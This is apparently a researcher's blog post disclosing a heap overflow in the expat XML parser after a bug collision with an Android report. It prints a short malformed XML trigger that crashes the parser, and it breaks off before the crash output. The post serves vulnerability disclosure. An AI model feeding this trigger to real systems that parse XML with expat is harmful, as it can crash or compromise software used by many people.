[CVE-2016-????] expat xml parser heap overflow vulnerability
TL;DR: I found a XML bug that can fit into a Tweet!
Around one month ago I found a nice bug in the expat XML parser, which is very popular, it’s for sure used in Android and Google Chrome, but also accordingly to Wikipedia it’s used also in Apache HTTP Server, Mozilla, Perl, Python and PHP. So it affects lot of software projects and lot of users.
I reported it to the Android team for disclosure but…
…today they notified me there was a bug collision, so I’m writing a blogpost to disclose it.
The coolest thing about this bug is that it can actually the trigger can fit into a tweet :D
If you make it printable it’s more or less:
<?x0?><!DOCTYPE c0 SYSTEM ""[<!----><!ENTITY R0 ""0
Anyway let’s get back to business…
Here you can see the crash (outline is just a tool that takes from stdin the xml and output some informations using the expat library: